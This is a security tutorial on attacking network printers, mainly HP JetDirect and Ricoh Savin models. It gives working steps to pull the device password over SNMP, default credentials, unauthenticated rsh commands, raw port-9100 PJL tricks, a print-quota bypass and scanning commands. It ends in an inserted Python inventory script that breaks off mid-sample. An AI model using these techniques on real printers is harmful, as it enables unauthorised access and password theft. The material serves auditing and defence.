
Page 1: Hacking Network Printers (M

Hacking Network Printers (Mostly HP JetDirects, but a little info on the Ricoh Savins)

By Adrian "Irongeek" Crenshaw

Hack a printer you say, what kind of toner have you been smoking, Irongeek? Well, I'm here to tell you, there's more that can be done with a printer to compromise network security than one might realize. In the olden days a printer may not have been much of a concern other than the threat from folks dumpster diving for hard copies of the documents that were printed from it, but many modern printers come network aware with embedded Operating Systems, storage and full IP stacks. This article will attempt to point out some of the more interesting things that can be done with a network based printer to make it reveal information about its users, owners and the network it's part of.

Some of this article may seem a little Black-hat as it concentrates more on the breaking-in than the keeping-out. However I feel this information will be useful to system administrators and auditors so that they know what sorts of things to look out for when it comes to network printers. If you want more advice on how to lock down your network printer, visit your vendor's web site. A guide from HP is linked at the bottom of this article for your convenience. If nothing else, this article may get you thinking in the right direction.

For my tests I will mostly be using a Hewlett-Packard LaserJet 4100 MFP (Fax/Printer/Copier/Scanner), an HP JetDirect 170x and an HP JetDirect 300X (J3263A), but I will also touch a bit on the Ricoh Savin series of printers lest you think HPs are the only network printers with security problems.

Much of this article will read like a huge brain dump, sort of disorganized and hazy like my mind. It all started as a project for Droop's Infonomicon TV and it snowballed from there with no specific direction. Bear with me as I clean it up and other folks send me new additions and suggestions to make this article more useful.

The most recent version of this article can be found at: http://www.irongeek.com/i.php?page=security/networkprinterhacking

Table of Contents:

Intro to the concepts
Diagnostics page
Stupid Printer Tricks
JetDirect password notes
Getting a JetDirect password remotely using the SNMP vulnerability
Controlling the JetDirect box with telnet/web browser
RSH commands and Ricoh Savin Aficio Printers
Controlling and finding JetDirect boxes with JetAdmin
Finding Network printers using Nmap and SNMP tools
Finding info about the printer using SNMP tools
Finding Printers with Google
Using a JetDirect box as an Nmap Idlescan Zombie
Setting up a direct IP printer in Windows and Linux
Changing the LCD display text using HPhack, IGhphack or Hijetter
Phenoelit's Hijetter and PFT
Setting the LCD Display with Hijetter
Changing settings with Hijetter
Using Hijetter to treat some JetDirect boxes as file/web servers
Finding stored faxes and print jobs on JetDirect printers
Using IP ACLs to restrict access
Don't forget to look for Stored Documents via the web interface
Coding your own scripts with PHP, Perl and PJL
Fixing a busted hard drive with Ghost
Sniffing print jobs and replaying them
A note on Plain-text authentication protocols
Other Ideas
Links to Tools

Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...

1 of 37 02/04/2009 08:17

Side note on a Pharos Uniprint vulnerability
Spamming Printers
DoSing the network or the printer
Media
Useful links for further research
Change Log

Intro to the concepts

There are several TLAs (Three Letter Acronyms) I will be using throughout this article, so I'd best get them out of the way now. PCL stands for Printer Control Language, which was developed by HP and has become one of the most common printer protocols. Another page description language you should be aware of is PostScript (PS), which was designed by Adobe to allow for more complicated things to be printed from a plotter/printer. PJL (Printer Job Language) is an extension of PCL that can tell a printer what to do, from changing device settings to transferring files. There are also three major network printing protocols you should be aware of. Here's a table with some of the pertinent information about each protocol:

Name                                                 Meaning                        Port
LPD (aka Berkeley printing system)                   Line Printer Daemon protocol   515/tcp
IPP                                                  Internet Printing Protocol     631/tcp
JetDirect (aka AppSocket, aka Raw, aka PDL-datastream)                               9100/tcp

Since my focus is on JetDirects I will mostly be talking about and using AppSocket/PDL-datastream, but since many JetDirects can also work with IPP and LPD, and many non-HP network printers also use AppSocket, you should be aware of the existence of all three. There are also network printers that use the IPX, AppleTalk and SMB protocols to communicate (some Savins, for example). I'll not cover IPX and AppleTalk because of my lack of experience with them; maybe someone else who reads this page will submit some info on them for me to post (credit will be given). SMB I may try to cover at a later time. Now that the formalities are out of the way, let's start playing with printers.

Diagnostics page

The pictures above are of an external JetDirect 170x box. Notice the picture on the right; on the far right hand side you will notice a little button labeled "test". Pressing this button on most JetDirect boxes will print out a diagnostic page listing statistics and the IP settings for the JetDirect box. If your printer has an internal JetDirect card you will have to negotiate the menus to find out how to print this diagnostics page. Once you hit the test button the printer should print out a page or two that lists information like host name, MAC address, IP address, subnet mask, default gateway, firmware revision and some general statistics. The IP/host name will be especially useful if you want to bypass print quota software by setting up direct IP printing on your Windows or Linux box. If you don't have physical access to the JetDirect box you can still find its IP or host name by seeing what its port is listed as, if that network printer has been set up on a Windows box you have access to.

As you can see by the graphic on the left, the host name for this JetDirect box is npib1002c. Sometimes you will see a port listed as something like IP_192.168.1.102, where obviously 192.168.1.102 is the JetDirect's IP. You can pretty much use a host name or an IP interchangeably on your LAN, and if the host name has a fully qualified domain name you should be able to address it from the Internet as well.

If you don't have access to a JetDirect box, or if your PC is not connected to one, don't despair. In the next few sections I will describe how to find these printers on the LAN/Internet using Nmap and JetAdmin.

Stupid Printer Tricks

I called this section Stupid Printer Tricks because while these activities aren't very technical, they do illustrate the simplicity of the RAW/AppSocket protocol that listens on port 9100/tcp on JetDirects and most other network printers. Try this: find your printer's IP using the Diagnostics page, then web surf to:

http://your-printers-ip:9100

The ":9100" at the end is there to tell your browser to connect on port 9100/tcp. When you try to establish the connection you should notice that the browser does not go anywhere; this is because what's running on port 9100/tcp is not a web server. Click the stop button on your browser to tell it to stop trying to connect, then go take a look at the printer. Depending on what browser you use you should see a printout something like one of the following:

Firefox:

GET / HTTP/1.1
Host: tux:9100
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

Internet Exploiter:

GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: test:9100
Connection: Keep-Alive

You see, anything that the printer sees coming in on port 9100/tcp it tries to read as a print job. The two texts you see above are HTTP GET requests for the root document of the server. The network printer does not understand this and just tries to print the request out as text. Another thing you can try is telnetting to port 9100 (we will assume your printer's IP is 192.168.1.2), typing in some text, and seeing it print:

Irongeek:~# telnet 192.168.1.2 9100
Trying 192.168.1.2...
Connected to 192.168.1.2.
Escape character is '^]'.
hello printer
^]
telnet> quit
Connection closed.
Irongeek:~#

You should now see a printout that just has the words "hello printer" on it. The "^]" represents pressing the Control key and the ] bracket at the same time. The above example was done in *nix, but the same commands should work in Windows. Keep in mind you may not see all of what you type in (highlighted in red in the original) unless you have local echo turned on (which seems to be off by default in Windows).

There are exceptions to network printers just printing out everything sent to port 9100. This trick, for which more details will be given later, should change the LCD display to say what you want. It's not supported on all printers, but if you have an HP it should work. I've got to thank Dipswitch for pointing out that you don't need fancy tools or code to do it (but the tools do make it easier).

With Telnet:

Irongeek:~# telnet 192.168.1.2 9100
@PJL RDYMSG DISPLAY="Some Text"
^]
telnet> quit
Irongeek:~#

Or Netcat:

Irongeek:~# echo @PJL RDYMSG DISPLAY=\"Some Text\" | netcat -q 0 192.168.1.2 9100
Irongeek:~#

JetDirect password notes

Most of the time folks never even turn the JetDirect's password options on, but if they do they quickly find that they don't always work in logical ways.

If you are using a newer JetDirect box like one of the following:

680N (J6058A)
615N (J6057A)
610N (J4169A, J4167A)
380X (J6061A)
310X (J6038A)
250M (J6042A)
75X (J6035A)

or an HP printer with an internal JetDirect card like:

HP LaserJet 4100 series
HP LaserJet 8150 series
HP LaserJet 9000 series
HP Color LaserJet 4550 series
HP Color LaserJet 4600
HP Designjet 5000 series or HP Business Inkjet 2600

then the telnet and device password used by the Web interface and JetAdmin software are the same. If you telnet in you will be prompted for a user name and password. The user names "root", "admin", "administrator" and "supervisor" are all valid and equivalent.

If you are using an older JetDirect box like one of the following:

600N (J3110A, J3111A, J3112A, J3113A)
400N (J4100A, J4105A, J4106A)
300X
500X
170X (J3296A, J4101B, J3263A, J3264A, 3265A, J4102B, J3258B)

then things are more confusing. First, if you telnet in you will only be prompted for a password; no user name is asked for. If you set up a password for the telnet service it may not be the same password as for the web interface, and vice versa. In other words there are two passwords on at least some JetDirect boxes, one for telnetting into it and one for the web interface/JetAdmin software. Telnet passwords are case sensitive but Web/JetAdmin passwords are not. Telnet passwords are limited to 16 characters, Web/JetAdmin passwords to 12. Just so you know, Hijetter (discussed later) may report the password as disabled even if both passwords are set, but that's ok since it bypasses passwords anyway.

The Web interface and JetAdmin use SNMP (Simple Network Management Protocol) to control the JetDirect boxes and require that you know the password, but I've read that other third party SNMP configuration utilities will just ignore the password altogether and can connect and control the JetDirect anyway. It might be a good idea for some to change their SNMP community names to something other than the default public/private, but even if they do they could still be sniffed off of the wire unless they have a more recent JetDirect that supports SNMPv3 and SSL/TLS.

If you use the JetAdmin for Windows 2000 desktop software be aware that it automatically stores passwords in the registry once you use it. For example, if the MAC address of a JetDirect box was 001083A2C913 then JetAdmin would store the password "password" in User\Software\Hewlett-Packard\HP JetAdmin\DeviceOptions\001083A2C913 in a value called "Access" as "50 00 41 00 53 00 53 00 57 00 4f 00 52 00 44,00,00,00". In case you don't notice it, this HEX string is the password "password" converted to all uppercase, with each letter turned into its HEX equivalent, with a null character between each password character, and then null padded.

Brute forcing these passwords might be an option since logging on to many network printers isn't all that involved. As you already know telnet is unencrypted, so sniffing those passwords is trivial. As I found by sniffing with Ethereal, the web interface on older JetDirects (really a Java applet) and JetAdmin use SNMP to configure the JetDirect box and also pass their password as plain text. Look for the password just before the string "=108" in the dumps. Some newer JetDirects don't do this, and can use SSL to encrypt the connection.

If you set a password on a JetDirect box while you are playing around with it and forget what it is, all you have to do is a hard reset. Unplug the power cord, hold down the test/status button, and while still holding the button plug the power back in. The password and all of the other settings should now be cleared.

Getting a JetDirect password remotely using the SNMP vulnerability

I was cruising around SecurityFocus.com looking for JetDirect exploits and I came across a doozy:

http://www.securityfocus.com/bid/7001/exploit

Since the link above is rather shy on details I'll show you the exploit step by step. It seems that the device password for many JetDirects is stored in almost plain text and is accessible via SNMP using the read community name. Most folks leave their SNMP community name as "public", but even if it has been changed it's likely sniffable. Also try "internal" as the community name, as this is the default write community name on many JetDirects. Reports are that on some JetDirects, even if you change the community name, "internal" will still work. With the Net-SNMP toolset the password is easy to recover:

Irongeek:~# snmpget -v 1 -c public 192.168.2.46 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
SNMPv2-SMI::enterprises.11.2.3.9.1.1.13.0 = Hex-STRING: 50 41 53 53 57 4F 52 44 3D 31 30 38 3B 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Irongeek:~#

Notice the hex string. In hex, 50=P, 41=A, 53=S, 53=S, 57=W, 4F=O, 52=R, 44=D, 3D='=', 31=1, 30=0, 38=8, 3B=; In other words, "PASSWORD=108;", which means the password is "PASSWORD". I also tried it after changing the password to newpassword, and likewise "50 41 53 53 57 4F 52 44 3D 31 30 38 3B" is "NEWPASSWORD=108;". Anything before the "=108;" is the password. For those too lazy to do the HEX to ASCII conversion themselves, check out:

http://nickciske.com/tools/hex.php

Also note that I entered my passwords in lowercase, but they were stored in uppercase. These passwords are case insensitive. Some of the vulnerable JetDirects are:

HP JetDirect J3263A
HP JetDirect J3113A
HP JetDirect J3111A

Other JetDirects may also be vulnerable, so it's worth testing. I tried it with my Hewlett Packard HP JetDirect 300X (J3263A), and installing the latest firmware (H.08.49) seems to fix this problem, but I imagine there are still a lot of un-patched JetDirects out there. Some print servers like the HP J3258A JetDirect 170X do not have user upgradeable firmware at all, so you are stuck with the firmware they were shipped with. The only way to fix the vulnerability on them is to buy a new JetDirect.

Controlling the JetDirect box with telnet/web browser

Most JetDirect boxes can be configured with a web browser or via a telnet session. Below you will see a screenshot of the web-based configuration tool. Just type the IP or host name of the JetDirect box into the address bar of your favorite Java-enabled web browser and it should work.

Here is an example of connecting to a JetDirect box with a telnet session, bringing up the help screen and resetting the host name:

Irongeek:~# telnet 192.168.1.2
Trying 192.168.1.2...
Connected to 192.168.1.2.
Escape character is '^]'.

HP JetDirect

Please type "?" for HELP, or "/" for current settings
> ?

To Change/Configure Parameters Enter:
Parameter-name: value <Carriage Return>

Parameter-name  Type of value
ip: IP-address in dotted notation
subnet-mask: address in dotted notation (enter 0 for default)
default-gw: address in dotted notation (enter 0 for default)
syslog-svr: address in dotted notation (enter 0 for default)
idle-timeout: seconds in integers
set-cmnty-name: alpha-numeric string (32 chars max)
host-name: alpha-numeric string (upper case only, 32 chars max)
dhcp-config: 0 to disable, 1 to enable
allow: <ip> [mask] (0 to clear, list to display, 10 max)

addrawport: <TCP port num> (<TCP port num> 3000-9000)
deleterawport: <TCP port num>
listrawport: (No parameter required)

addstring: <name> <contents>
contents - For non-printable characters use \xx for two digit hex number
deletestring: <name>
liststring: (No parameter required)
addq: <name> [prepend] [append] [processing]
prepend - The prepend string name
append - The append string name
Use NULL for no string
processing - RAW, TEXT, or AUTO
deleteq: <name>
listq: (No parameter required)
defaultq: <name>

ipx/spx: 0 to disable, 1 to enable
dlc/llc: 0 to disable, 1 to enable
ethertalk: 0 to disable, 1 to enable
banner: 0 to disable, 1 to enable

Type passwd to change the password.

Type "?" for HELP, "/" for current settings or "quit" to save-and-exit.
Or type "exit" to exit without saving configuration parameter entries
> /

===JetDirect Telnet Configuration===
Firmware Rev.   : H.08.32
MAC Address     : 00:60:b0:6d:47:c6
Config By       : DHCP

IP Address      : 192.168.1.2
Subnet Mask     : 255.255.255.0
Default Gateway : 192.168.1.1
Syslog Server   : Not Specified
Idle Timeout    : 90 Seconds
Set Cmnty Name  : Not Specified
Host Name       : NPI6D47C6

DHCP Config     : Enabled
Passwd          : Disabled
IPX/SPX         : Enabled
DLC/LLC         : Enabled
Ethertalk       : Enabled
Banner page     : Enabled
> host-name:BUTTMONKEY
> /

===JetDirect Telnet Configuration===
Firmware Rev.   : H.08.32
MAC Address     : 00:60:b0:6d:47:c6
Config By       : DHCP

IP Address      : 192.168.1.2
Subnet Mask     : 255.255.255.0
Default Gateway : 192.168.1.1
Syslog Server   : Not Specified
Idle Timeout    : 90 Seconds
Set Cmnty Name  : Not Specified
Host Name       : BUTTMONKEY

DHCP Config     : Enabled
Passwd          : Disabled
IPX/SPX         : Enabled
DLC/LLC         : Enabled
Ethertalk       : Enabled
Banner page     : Enabled
> quit

===JetDirect Parameters Configured===

IP Address      : 192.168.1.2
Subnet Mask     : 255.255.255.0
Default Gateway : 192.168.1.1
Syslog Server   : Not Specified
Idle Timeout    : 90 Seconds
Set Cmnty Name  : Not Specified
Host Name       : BUTTMONKEY

DHCP Config     : Enabled
Passwd          : Disabled
IPX/SPX         : Enabled
DLC/LLC         : Enabled
Ethertalk       : Enabled
Banner page     : Enabled
User Quitting
Connection closed by foreign host.
Irongeek:~#

Important note about using telnet to configure a JetDirect box: You must use the "quit" command to end your session if you want your changes to be saved. If you just kill the telnet terminal all of the changes you made during the session will be lost.

RSH commands and Ricoh Savin Aficio Printers

I've got to thank Mslaviero for introducing me to this aspect of Ricoh Savin printers. Check out his site:

http://www.cs.up.ac.za/cs/mslaviero/archives/2005/04/28/ricoh-afficio-2035-security-or-lack-thereof/

Normally you might want to log in to your Savin with telnet, but it's likely password protected (the default password is "password" on some Savins). Don't fear, there is another way you may be able to execute some commands on the printer. You may have noticed from an Nmap scan that your Ricoh Savin has port 514/tcp open. Guess what? You can use the rsh *nix utility to execute commands remotely on the box. First you will want to make sure you have the rsh client installed. Rsh has largely been deprecated because of its unencrypted connections and other security problems. If you try rsh on your Linux box it will likely try to use SSH automatically instead, which won't work. If you have a Debian based distribution install rsh-client (apt-get install rsh-client) and try out some of these commands to gather more information from your Savin printer:

The info command will list the printer's current configuration and supported options:

root@Irongeek:~# rsh 192.168.1.2 info
(Input Tray)
No. Name         Page Size    Status
-------------------------------------------------------------------------------
1   Tray 1       11 x 8 1/2"  PaperEnd.
2   Tray 2       11 x 8 1/2"  Normal.
3   LCT          11 x 8 1/2"  Normal.
4   Bypass Tray  11 x 8 1/2"  PaperEnd.

(Output Tray)
No. Name                 Status
------------------------------------------------------------------------
1   Internal Tray 1      Normal.
2   Finisher Upper Tray  Normal.
3   Finisher Shift Tray  Normal.

(Printer Language)
No. Name                          Version
--------------------------------------------------------
1   Automatic Language Switching  2.21.5.3
2   Customized PJL                2.21.5.3
3   RPCS                          2c.9.5a
4   PCL 5e Emulation              1.01
5   PCL XL Emulation              1.01
6   Adobe PostScript 3            1.02

Stat gives you system stats (duh):

root@Irongeek:~# rsh 192.168.1.2 stat
Printer status : Printing.(Ready.)
Online/Offline : Online.

Rank    Owner      Job   Files             Total Size
active  anonymous  2491  (standard input)  126980 bytes

The syslog command will return information such as the version, the WINS server of the network, what daemons were started and other bits of info:

root@Irongeek:~# rsh 192.168.1.2 syslog
#[ncsd(17)]06/02/24 07:16:18 RICOH Aficio 2045e 2.40 INFO:
#[ncsd(17)]06/02/24 07:16:18 Network Control Service 4.12 INFO:
#[ncsd(17)]06/02/24 07:16:18 Copyright (C) 1994-2002 RICOH CO.,LTD. INFO:
#[ncsd(17)]06/02/24 07:16:19 Ethernet started with IP: 192.168.1.2 INFO:
#[inetd(42)]06/02/24 07:16:19 inetd start. INFO:
#[snmpd(43)]06/02/24 07:16:19 Snmpd Start. INFO:
#[httpd(44)]06/02/24 07:16:19 httpd start. INFO:
#[ncsd(17)]06/02/24 07:16:19 Current Interface Speed : 100Mbps(full-duplex) INFO:
#[nbtd(45)]06/02/24 07:16:19 nbtd start. INFO:
#[nbtd(45)]06/02/24 07:16:19 Name registration success. WINS Server=192.168.30.100 NetBIOS Name=RNP82398B (Ethernet) INFO:
#[nbtd(45)]06/02/24 07:16:19 Name registration success. WINS Server=192.168.30.100 NetBIOS Name=IGPrinter (Ethernet) INFO:
#[nbtd(45)]06/02/24 07:16:19 Name registration success. WINS Server=192.168.30.100 NetBIOS Name=WORKGROUP (Ethernet) INFO:
#[multid(48)]06/02/24 07:16:21 multid start. INFO:
#[diprintd(51)]06/02/24 07:16:21 started. INFO:
#[lpd(52)]06/02/24 07:16:21 restarted INFO:
#[snmpd(43)]06/02/24 07:16:28 Snmp over ip is ready. INFO:
#[httpd(44)]06/02/24 07:16:28 ipp enable. INFO:
#[httpd(44)]06/02/24 07:16:28 nrs disable. INFO:
#[lpd(52)]06/03/06 22:19:28 bad request (71) from WARNING:
#[lpd(52)]06/03/06 22:19:28 Illegal service request ERR:
#[lpd(52)]06/03/06 22:19:28 Lost connection ERR:
#[rshd(2570)]06/03/06 22:19:33 192.168.19.56 can't connect second port: 65360 INFO:
#[rshd(2596)]06/03/06 22:50:32 (192.168.19.56) help: Command not supported. ERR:

Prnlog gives you more information on recently printed documents:

root@Irongeek:~# rsh 192.168.1.2 prnlog
ID    User  Page  Result    Time
--------------------------------------------------------
2472        2     Finished  06/03/06 21:29
2473        10    Finished  06/03/06 21:33
2474        1     Finished  06/03/06 21:58
2475        19    Finished  06/03/06 21:59
2476        3     Finished  06/03/06 22:16
2477        4     Finished  06/03/06 22:16
2478        2     Finished  06/03/06 22:17
2479        4     Finished  06/03/06 22:19
2480        5     Finished  06/03/06 22:22
2481        3     Finished  06/03/06 22:24
2482        2     Finished  06/03/06 22:29
2483        2     Finished  06/03/06 22:35
2484        1     Finished  06/03/06 22:37
2485        2     Finished  06/03/06 22:38
2486        2     Finished  06/03/06 22:38
2487        2     Finished  06/03/06 22:40
2488        6     Finished  06/03/06 22:40
2489        2     Finished  06/03/06 22:45
2490        4     Finished  06/03/06 22:52
2491        30    Finished  06/03/06 22:53

Ps will list the currently running processes:

root@Irongeek:~# rsh 192.168.1.2 ps
pid=2605 [rshd]
pid=  57 [pcl]
pid=  55 [rsp]
pid=  52 [lpd]
pid=  51 [diprintd]
pid=  49 [centrod]
pid=  48 [multid]
pid=  47 [gps-web]
pid=  46 [gps-pm]
pid=  45 [nbtd]
pid=  44 [httpd]
pid=  43 [snmpd]
pid=  42 [inetd]
pid=  41 [mcsc]
pid=  40 [meu]
pid=  38 [plotter_sa]
pid=  36 [shmlog]
pid=  35 [copy]
pid=  34 [gps]
pid=  33 [scan]
pid=  32 [nfa]
pid=  31 [wdb]
pid=  30 [pts]
pid=  29 [websys]
pid=  23 [nrs]
pid=  21 [dcs]
pid=  19 [ous]
pid=  18 [ucs]
pid=  17 [ncsd]
pid=  16 [ecs]
pid=  15 [mcs]
pid=  14 [fcuh]
pid=  13 [scs]
pid=  12 [imh]
pid=   3 [checker]
pid=   2 [pagedaemon]
pid=   1 [init]
pid=   0 [swapper]

The print command prints whatever you tell it to on a sheet of paper (in this case just the word "test"):

root@Irongeek:~# rsh 192.168.1.2 print
test
root@Irongeek:~#

Also try "rsh ip-address reboot" to see if you can reset the printer remotely (check syslog to see if it worked).

Much the same information can be obtained by downloading files from the Savin printer's built-in FTP server and reading them in a text editor. See the screenshot below:


Controlling and finding JetDirect boxes with JetAdmin

A nice tool Hewlett-Packard puts out for controlling JetDirect boxes is JetAdmin. Currently HP only offers a web version of the software, called appropriately enough Web JetAdmin, with versions for both Windows and Linux. Unfortunately you have to register on HP's site to get it, but you can download it without registering from this mirror site:

http://www.svrops.com/svrops/dwnldprog.htm

Personally I prefer the older HP JetAdmin for Window 2000 (v3.42, the last version to be released before it was

discontinued but still works fine with XP) as it seems quicker and less bloated; however it may be missing some of the

features of the newer Web JetAdmin. You can download the desktop version from:

http://www.helpdesk.umd.edu/os/windows_nt/printing/674/

JetAdmin is very fast at finding JetDirect boxes on your subnet since it does an SNMP broadcast to the network to locate them. Just right click and choose "Properties" to find more information about the JetDirect box, or choose "Modify" to bring up a wizard that lets you change the description, IP settings and other variables associated with the printer. JetAdmin can also generate reports about the network printers it finds. JetAdmin can do too many things for me to describe them all in detail here, so go download it and try it out.

As a side note, if you want to find boxes on a network running Web JetAdmin, do a port scan for 8000/tcp (HTTP) and 8443/tcp (HTTPS); if its password is weak or non-existent it's an easy way to control a network's printers. If you are interested in a JetAdmin-like tool for the Ricoh Savin printers look into SmartDeviceMonitor.

Finding Network printers using Nmap and SNMP tools

Using Nmap from your Linux (preferably) or Windows box makes finding JetDirects and other network printers pretty easy. The Nmap commands I will be showing in this section are very simple and not very stealthy, so you may want to consult the Nmap man page or a good Nmap tutorial for more ideas. You could use a simple Nmap command like:

nmap -A 192.168.1.*

to scan the range 192.168.1.1-255 for common ports and do an OS and version detect on the systems it finds. The output of the above command would look something like the following:

Irongeek:~# nmap -A 192.168.1.*


Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-09-08 15:12 EDT
Interesting ports on igprinter (192.168.1.93):
(The 1656 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE    VERSION
21/tcp   open  ftp        HP JetDirect ftpd
23/tcp   open  telnet?
80/tcp   open  http       HP Jetdirect httpd
280/tcp  open  http       HP Jetdirect httpd
515/tcp  open  sdmsvc     LANDesk Software Distribution (sdmsvc.exe)
631/tcp  open  http       HP Jetdirect httpd
9100/tcp open  jetdirect?
Device type: printer|print server
Running: HP embedded
OS details: HP LaserJet printer/print server

Nmap finished: 1 IP address (1 host up) scanned in 120.963 seconds
Irongeek:~#

There's one problem with the simple command shown above. If you are using a version of Nmap before 3.90, on some network printers it will create garbage print jobs with text like:

GET / HTTP/1.0

OPTIONS / HTTP/1.0

OPTIONS / RTSP/1.0

on each of the sheets printed, wasting a lot of paper. This happens because when Nmap does version detection on port 9100/tcp it sends some of the probe requests from the nmap-service-probes file to figure out what service is running there. Since the JetDirect box does not understand what it's being sent it just prints out the probes and you wind up with a bunch of garbage printed out. The easiest way to fix this is to upgrade to Nmap 3.90 or better, but barring that, there is a workaround. A better and faster solution might be to only probe for common network printer ports other than 9100 (Note: You may want to leave off -T insane for stealth/bandwidth reasons):

nmap -A -p 21,23,80,280,515,631 192.168.1.* -T insane

or maybe not use the -A option (which is like doing -sV and -O together) at all and just use -O to detect the OS that's running, without sending probes to the ports to find out what service versions are running.

While we are at it, it might be interesting to run a UDP scan on the JetDirect box as well.

Irongeek:~# nmap -sU 192.168.1.*

Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-09-11 06:21 EDT
Interesting ports on 192.168.1.93:
(The 1474 ports scanned but not shown below are in state: closed)
PORT      STATE         SERVICE
137/udp   open|filtered netbios-ns
161/udp   open|filtered snmp
427/udp   open|filtered svrloc
32768/udp open|filtered omad
MAC Address: 00:60:B0:6D:47:C6 (Hewlett-packard CO.)

Nmap finished: 1 IP address (1 host up) scanned in 86.238 seconds
Irongeek:~#

As you can see we found quite a few ports to look into. I'll go over some of the things you can do with them in a bit. By the way, you may notice the NMB port 137/udp is open, which means you may be able to find printers on the LAN via the NetBIOS name service.

By the way, to find Ricoh Savins on the network you could use an Nmap command something like the following:

Irongeek:/# nmap -A 192.168.1.3 -T insane

Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-09-09 23:49 EDT
Interesting ports on 192.168.1.3:
(The 1656 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE    VERSION
21/tcp   open  ftp
23/tcp   open  telnet?
80/tcp   open  http?
514/tcp  open  shell?
515/tcp  open  printer    lpd (error: Illegal service request)
631/tcp  open  ipp?
9100/tcp open  jetdirect?
5 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============

...Omitted for security and space reasons...

MAC Address: 00:00:74:80:7C:B8 (Ricoh Company)
Device type: general purpose
Running: NetBSD
OS details: NetBSD 1.3I through 1.6
Uptime 6.506 days (since Sat Sep 3 11:42:37 2005)

Nmap finished: 1 IP address (1 host up) scanned in 94.690 seconds
Irongeek:/#

Notice that the Ricoh Savins have a lot of the same ports open as the HP JetDirects, but that the OS is detected as NetBSD (it will even run on your toaster).

Since many network printers respond to SNMP, another great way to find them is to use an SNMP service scanning tool. Ricoh puts out a good tool for finding and configuring many network printers called SmartDeviceMonitor. SmartDeviceMonitor seems to miss some network printers that aren't Savins, but if you use Ricoh Savin Aficio printers on your network it's a great tool for locating and polling them.

http://www.ricoh-usa.com/products/product_features.asp?pCategoryId=19&pSubCategoryId=46&pCatName=Solutions&pSubCatName=Device%20Management&pProductId=67&pProductName=SmartDeviceMonitor&tsn=Ricoh-USA

Foundstone's SNScan is another good choice:

http://www.foundstone.com/resources/proddesc/snscan.htm


or Softperfect's NetScan if you turn on the SNMP search options:

http://www.softperfect.com/products/networkscanner/

A third way you could find network printers (if you are on the same subnet) is to use Nmap or Cain to do an ARP sweep and look for any boxes with a MAC address belonging to Hewlett Packard, Ricoh or another printer vendor. These are likely network printers.
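Whichever scanner produced the listing, the useful next step for an admin is turning it into an inventory of what is actually a printer. The Python script below is an added example for this article (it is not Nmap's code, nor the author's): it reads Nmap's normal-format output like the listings above and reports each host that looks like a printer together with the evidence (a printer-related port open, or a vendor, OS or banner string that names a printer vendor). The scan text embedded in it is constructed from the kinds of lines shown above, not a real scan, and the keyword and port lists are assumptions you would tune for your own fleet.

```python
"""Pick likely network printers out of Nmap's normal-format output.

Added example for this article, not the article's or Nmap's own code. It
assumes the "normal" output layout shown above (nmap 3.x era): each host
block opens with "Interesting ports on ..." and may carry "MAC Address:",
"Running:" and "OS details:" lines. SAMPLE_NMAP_OUTPUT is constructed.
"""
import re

# Port/protocol pairs that usually belong to a printer or print server (assumption).
PRINTER_PORTS = {"515/tcp": "lpd", "631/tcp": "ipp", "9100/tcp": "jetdirect/raw"}
# Words in the MAC vendor lookup, OS fingerprint or banners that point at a printer.
PRINTER_WORDS = ("hewlett", "ricoh", "jetdirect", "laserjet", "printer")

HOST_RE = re.compile(r"^Interesting ports on (?:(\S+) \()?(\d+\.\d+\.\d+\.\d+)\)?:")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\S*\s+(\S+)(?:\s+(.*))?$")
MAC_RE = re.compile(r"^MAC Address: ([0-9A-Fa-f:]{17}) \((.*)\)")

SAMPLE_NMAP_OUTPUT = """\
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-09-08 15:12 EDT
Interesting ports on igprinter (192.168.1.93):
(The 1656 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE    VERSION
21/tcp   open  ftp        HP JetDirect ftpd
23/tcp   open  telnet?
80/tcp   open  http       HP Jetdirect httpd
515/tcp  open  printer
9100/tcp open  jetdirect?
MAC Address: 00:60:B0:6D:47:C6 (Hewlett-packard CO.)
Running: HP embedded
OS details: HP LaserJet printer/print server

Interesting ports on 192.168.1.3:
(The 1656 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE    VERSION
21/tcp   open  ftp
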